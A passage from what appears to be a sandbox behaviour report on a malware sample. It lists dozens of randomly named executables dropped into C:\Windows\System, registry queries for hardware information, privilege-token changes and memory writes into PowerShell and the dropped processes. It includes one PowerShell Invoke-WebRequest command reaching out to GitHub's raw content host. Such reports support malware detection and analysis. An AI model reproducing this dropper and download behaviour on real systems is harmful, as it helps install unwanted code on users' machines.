File created C:\Windows\System\IRKUCnr.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KBVipBU.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qkzNuQx.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eOucNod.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vEhmQIC.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AZLEMat.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QYUudyD.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rAoPgMr.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EfTtDfj.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mCZokuL.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\URbnxhM.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XqFMEwg.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sRQgTiR.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AySilWT.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NlCbrAJ.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wrJuxbg.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GgSgDIU.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TlQvztI.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SEJkYzu.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IbmtlXC.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hLjUObW.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RVmMGVk.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\glbRzwn.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gLNXQRI.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ixCCios.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FrSUaRq.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JNNIFio.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vZytOuP.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yrUYazo.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iAxVPsj.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UCakFjA.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rayZrXf.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zacYXOy.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mKZZgKo.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aORGlWE.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PlOtWIO.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NrDvqxm.exe C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2752 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\vwURSqq.exe
PID 2752 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\vwURSqq.exe
PID 2752 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\WngOAur.exe
PID 2752 wrote to memory of 2056 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\WngOAur.exe
PID 2752 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\ENWWAPV.exe
PID 2752 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\ENWWAPV.exe
PID 2752 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\dmWoMWK.exe
PID 2752 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\dmWoMWK.exe
PID 2752 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\EioBpKL.exe
PID 2752 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\EioBpKL.exe
PID 2752 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\DdufjLC.exe
PID 2752 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\DdufjLC.exe
PID 2752 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\RYYPJaX.exe
PID 2752 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\RYYPJaX.exe
PID 2752 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\yXivLBF.exe
PID 2752 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\yXivLBF.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\GGAUtsA.exe
PID 2752 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\GGAUtsA.exe
PID 2752 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\IjbDOws.exe
PID 2752 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\IjbDOws.exe
PID 2752 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\EfIgxtu.exe
PID 2752 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\EfIgxtu.exe
PID 2752 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\msFAJgQ.exe
PID 2752 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\msFAJgQ.exe
PID 2752 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xVJwUwj.exe
PID 2752 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xVJwUwj.exe
PID 2752 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\uMgbhTy.exe
PID 2752 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\uMgbhTy.exe
PID 2752 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\BqmWcmN.exe
PID 2752 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\BqmWcmN.exe
PID 2752 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\WvuiSss.exe
PID 2752 wrote to memory of 4396 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\WvuiSss.exe
PID 2752 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\IBlFuHI.exe
PID 2752 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\IBlFuHI.exe
PID 2752 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\DKTcxMD.exe
PID 2752 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\DKTcxMD.exe
PID 2752 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\XPkwDvL.exe
PID 2752 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\XPkwDvL.exe
PID 2752 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\XPHDEiZ.exe
PID 2752 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\XPHDEiZ.exe
PID 2752 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\FdcYQlY.exe
PID 2752 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\FdcYQlY.exe
PID 2752 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\aRQkqdc.exe
PID 2752 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\aRQkqdc.exe
PID 2752 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\ThWupZa.exe
PID 2752 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\ThWupZa.exe
PID 2752 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\WODCwBP.exe
PID 2752 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\WODCwBP.exe
PID 2752 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\eBwWORu.exe
PID 2752 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\eBwWORu.exe
PID 2752 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\myCXvhw.exe
PID 2752 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\myCXvhw.exe
PID 2752 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\tbDPXFB.exe
PID 2752 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\tbDPXFB.exe
PID 2752 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\SjFvgmM.exe
PID 2752 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\SjFvgmM.exe
PID 2752 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\NBvmTxC.exe
PID 2752 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\NBvmTxC.exe
PID 2752 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\PaZJONn.exe
PID 2752 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\PaZJONn.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\jafrezm.exe
PID 2752 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\jafrezm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\vwURSqq.exe

C:\Windows\System\vwURSqq.exe

C:\Windows\System\WngOAur.exe

C:\Windows\System\WngOAur.exe

C:\Windows\System\ENWWAPV.exe

C:\Windows\System\ENWWAPV.exe

C:\Windows\System\dmWoMWK.exe

C:\Windows\System\dmWoMWK.exe

C:\Windows\System\EioBpKL.exe

C:\Windows\System\EioBpKL.exe

C:\Windows\System\DdufjLC.exe

C:\Windows\System\DdufjLC.exe

C:\Windows\System\RYYPJaX.exe

C:\Windows\System\RYYPJaX.exe

C:\Windows\System\yXivLBF.exe

C:\Windows\System\yXivLBF.exe

C:\Windows\System\GGAUtsA.exe

C:\Windows\System\GGAUtsA.exe

C:\Windows\System\IjbDOws.exe

C:\Windows\System\IjbDOws.exe

C:\Windows\System\EfIgxtu.exe

C:\Windows\System\EfIgxtu.exe

C:\Windows\System\msFAJgQ.exe

C:\Windows\System\msFAJgQ.exe

C:\Windows\System\xVJwUwj.exe

C:\Windows\System\xVJwUwj.exe

C:\Windows\System\uMgbhTy.exe

C:\Windows\System\uMgbhTy.exe

C:\Windows\System\BqmWcmN.exe

C:\Windows\System\BqmWcmN.exe

C:\Windows\System\WvuiSss.exe

C:\Windows\System\WvuiSss.exe

C:\Windows\System\IBlFuHI.exe

C:\Windows\System\IBlFuHI.exe

C:\Windows\System\DKTcxMD.exe

C:\Windows\System\DKTcxMD.exe

C:\Windows\System\XPkwDvL.exe

C:\Windows\System\XPkwDvL.exe

C:\Windows\System\XPHDEiZ.exe

C:\Windows\System\XPHDEiZ.exe

C:\Windows\System\FdcYQlY.exe

C:\Windows\System\FdcYQlY.exe

C:\Windows\System\aRQkqdc.exe

C:\Windows\System\aRQkqdc.exe

C:\Windows\System\ThWupZa.exe

C:\Windows\System\ThWupZa.exe

C:\Windows\System\WODCwBP.exe

C:\Windows\System\WODCwBP.exe

C:\Windows\System\eBwWORu.exe

C:\Windows\System\eBwWORu.exe

C:\Windows\System\myCXvhw.exe

C:\Windows\System\myCXvhw.exe

C:\Windows\System\tbDPXFB.exe

C:\Windows\System\tbDPXFB.exe

C:\Windows\System\SjFvgmM.exe

C:\Windows\System\SjFvgmM.exe

C:\Windows\System\NBvmTxC.exe

C:\Windows\System\NBvmTxC.exe

C:\Windows\System\PaZJONn.exe

C:\Windows\System\PaZJONn.exe

C:\Windows\System\jafrezm.exe

C:\Windows\System\jafrezm.exe

C:\Windows\System\IxJVqLC.exe

C:\Windows\System\IxJVqLC.exe

C:\Windows\System\MaOQvHi.exe

C:\Windows\System\MaOQvHi.exe

C:\Windows\System\KgmEKqX.exe

C:\Windows\System\KgmEKqX.exe

C:\Windows\System\rnATuCI.exe

C:\Windows\System\rnATuCI.exe

C:\Windows\System\IjBIlwG.exe

C:\Windows\System\IjBIlwG.exe

C:\Windows\System\tQneiNt.exe

C:\Windows\System\tQneiNt.exe

C:\Windows\System\hUFadcN.exe

C:\Windows\System\hUFadcN.exe

C:\Windows\System\DHXNyoa.exe

C:\Windows\System\DHXNyoa.exe

C:\Windows\System\CoiTgUW.exe

C:\Windows\System\CoiTgUW.exe

C:\Windows\System\ZZurYzd.exe

C:\Windows\System\ZZurYzd.exe

C:\Windows\System\xmVNIqm.exe

C:\Windows\System\xmVNIqm.exe

C:\Windows\System\dpdofjk.exe

C:\Windows\System\dpdofjk.exe

C:\Windows\System\QMvZpuf.exe

C:\Windows\System\QMvZpuf.exe

C:\Windows\System\XNtsQoq.exe

C:\Windows\System\XNtsQoq.exe

C:\Windows\System\vmfUkUp.exe

C:\Windows\System\vmfUkUp.exe

C:\Windows\System\kUDztcm.exe

C:\Windows\System\kUDztcm.exe

C:\Windows\System\WpShEXU.exe

C:\Windows\System\WpShEXU.exe

C:\Windows\System\lBdbnsf.exe

C:\Windows\System\lBdbnsf.exe

C:\Windows\System\mrkVCvS.exe

C:\Windows\System\mrkVCvS.exe

C:\Windows\System\buqVJNM.exe

C:\Windows\System\buqVJNM.exe

C:\Windows\System\XLVQSRB.exe

C:\Windows\System\XLVQSRB.exe

C:\Windows\System\eVymYde.exe

C:\Windows\System\eVymYde.exe

C:\Windows\System\iixFTTu.exe

C:\Windows\System\iixFTTu.exe

C:\Windows\System\KRbMiKs.exe

C:\Windows\System\KRbMiKs.exe

C:\Windows\System\KzexIiU.exe

C:\Windows\System\KzexIiU.exe

C:\Windows\System\cyHdPxs.exe

C:\Windows\System\cyHdPxs.exe

C:\Windows\System\GqqUqiB.exe

C:\Windows\System\GqqUqiB.exe

C:\Windows\System\YyFaSWZ.exe

C:\Windows\System\YyFaSWZ.exe

C:\Windows\System\vVjctlF.exe

C:\Windows\System\vVjctlF.exe

C:\Windows\System\TJqVWkx.exe

C:\Windows\System\TJqVWkx.exe

C:\Windows\System\EolTWdK.exe

C:\Windows\System\EolTWdK.exe

C:\Windows\System\afGujuW.exe

C:\Windows\System\afGujuW.exe

C:\Windows\System\PhrFKXu.exe

C:\Windows\System\PhrFKXu.exe

C:\Windows\System\HstlphV.exe

C:\Windows\System\HstlphV.exe

C:\Windows\System\WWnGIYj.exe

C:\Windows\System\WWnGIYj.exe

C:\Windows\System\iPRsnbN.exe

C:\Windows\System\iPRsnbN.exe

C:\Windows\System\VVBMmAx.exe

C:\Windows\System\VVBMmAx.exe

C:\Windows\System\vHTlZjs.exe

C:\Windows\System\vHTlZjs.exe

C:\Windows\System\SotHLUP.exe

C:\Windows\System\SotHLUP.exe

C:\Windows\System\DCFsnDO.exe

C:\Windows\System\DCFsnDO.exe

C:\Windows\System\UkeXuHb.exe

C:\Windows\System\UkeXuHb.exe

C:\Windows\System\LWyewNt.exe

C:\Windows\System\LWyewNt.exe

C:\Windows\System\UIIyyPS.exe

C:\Windows\System\UIIyyPS.exe

C:\Windows\System\mUMWMzV.exe

C:\Windows\System\mUMWMzV.exe

C:\Windows\System\bQoIURE.exe

C:\Windows\System\bQoIURE.exe

C:\Windows\System\LCAnjKS.exe

C:\Windows\System\LCAnjKS.exe

C:\Windows\System\WSPNpkE.exe

C:\Windows\System\WSPNpkE.exe

C:\Windows\System\uGPHZmA.exe

C:\Windows\System\uGPHZmA.exe

C:\Windows\System\zCmleir.exe

C:\Windows\System\zCmleir.exe

C:\Windows\System\qLfAWZH.exe

C:\Windows\System\qLfAWZH.exe

C:\Windows\System\tvmwMuZ.exe

C:\Windows\System\tvmwMuZ.exe

C:\Windows\System\RaxYdYc.exe

C:\Windows\System\RaxYdYc.exe

C:\Windows\System\geSNGQO.exe

C:\Windows\System\geSNGQO.exe

C:\Windows\System\FMLjMoP.exe

C:\Windows\System\FMLjMoP.exe

C:\Windows\System\ZqcncUG.exe

C:\Windows\System\ZqcncUG.exe

C:\Windows\System\oCerVFm.exe

C:\Windows\System\oCerVFm.exe

C:\Windows\System\PKEWnSU.exe

C:\Windows\System\PKEWnSU.exe

C:\Windows\System\fIwxoiQ.exe

C:\Windows\System\fIwxoiQ.exe

C:\Windows\System\FmUmIlS.exe

C:\Windows\System\FmUmIlS.exe

C:\Windows\System\VkEtnnA.exe

C:\Windows\System\VkEtnnA.exe

C:\Windows\System\furcBTB.exe

C:\Windows\System\furcBTB.exe

C:\Windows\System\hQbtKjb.exe

C:\Windows\System\hQbtKjb.exe

C:\Windows\System\bzaipGW.exe

C:\Windows\System\bzaipGW.exe

C:\Windows\System\jotHRGx.exe

C:\Windows\System\jotHRGx.exe

C:\Windows\System\CVPDNDb.exe

C:\Windows\System\CVPDNDb.exe

C:\Windows\System\MQsorJD.exe

C:\Windows\System\MQsorJD.exe

C:\Windows\System\vybidhJ.exe

C:\Windows\System\vybidhJ.exe

C:\Windows\System\WUFzAyo.exe

C:\Windows\System\WUFzAyo.exe

C:\Windows\System\EcRydlv.exe

C:\Windows\System\EcRydlv.exe

C:\Windows\System\wXeJvVb.exe

C:\Windows\System\wXeJvVb.exe

C:\Windows\System\lxdqjAE.exe

C:\Windows\System\lxdqjAE.exe

C:\Windows\System\DRcIEep.exe

C:\Windows\System\DRcIEep.exe

C:\Windows\System\mYkZhKT.exe

C:\Windows\System\mYkZhKT.exe

C:\Windows\System\kRnYvON.exe

C:\Windows\System\kRnYvON.exe

C:\Windows\System\lYCvYHy.exe

C:\Windows\System\lYCvYHy.exe

C:\Windows\System\uIteTLU.exe

C:\Windows\System\uIteTLU.exe

C:\Windows\System\zwpEjQk.exe

C:\Windows\System\zwpEjQk.exe

C:\Windows\System\rgjlFeU.exe

C:\Windows\System\rgjlFeU.exe

C:\Windows\System\lURwcrf.exe

C:\Windows\System\lURwcrf.exe

C:\Windows\System\xiBNIsH.exe

C:\Windows\System\xiBNIsH.exe

C:\Windows\System\GZhgRnQ.exe

C:\Windows\System\GZhgRnQ.exe

C:\Windows\System\UZkSItU.exe

C:\Windows\System\UZkSItU.exe

C:\Windows\System\BIdXgBE.exe

C:\Windows\System\BIdXgBE.exe

C:\Windows\System\pYRPRfU.exe

C:\Windows\System\pYRPRfU.exe

C:\Windows\System\tZRTeTA.exe

C:\Windows\System\tZRTeTA.exe

C:\Windows\System\WGIoQSO.exe

C:\Windows\System\WGIoQSO.exe

C:\Windows\System\xpvtjBu.exe

C:\Windows\System\xpvtjBu.exe

C:\Windows\System\KmvNzfA.exe

C:\Windows\System\KmvNzfA.exe

C:\Windows\System\QqVPRgI.exe

C:\Windows\System\QqVPRgI.exe

C:\Windows\System\bBCeNTq.exe

C:\Windows\System\bBCeNTq.exe

C:\Windows\System\dkIngcw.exe

C:\Windows\System\dkIngcw.exe

C:\Windows\System\kxbtXWt.exe

C:\Windows\System\kxbtXWt.exe

C:\Windows\System\CdATrHW.exe

C:\Windows\System\CdATrHW.exe

C:\Windows\System\ZbAmDBt.exe

C:\Windows\System\ZbAmDBt.exe

C:\Windows\System\DheTgMR.exe

C:\Windows\System\DheTgMR.exe

C:\Windows\System\KHFffEL.exe

C:\Windows\System\KHFffEL.exe

C:\Windows\System\RSCOeRn.exe

C:\Windows\System\RSCOeRn.exe

C:\Windows\System\LhgqqTo.exe

C:\Windows\System\LhgqqTo.exe

C:\Windows\System\NzulRwF.exe

C:\Windows\System\NzulRwF.exe

C:\Windows\System\zXkJEHc.exe

C:\Windows\System\zXkJEHc.exe

C:\Windows\System\hVmeEYQ.exe

C:\Windows\System\hVmeEYQ.exe

C:\Windows\System\ZcTALwH.exe

C:\Windows\System\ZcTALwH.exe

C:\Windows\System\DjagXTV.exe

C:\Windows\System\DjagXTV.exe

C:\Windows\System\BVBWgWK.exe

C:\Windows\System\BVBWgWK.exe

C:\Windows\System\iUnXdhn.exe

C:\Windows\System\iUnXdhn.exe

C:\Windows\System\NGBxjte.exe

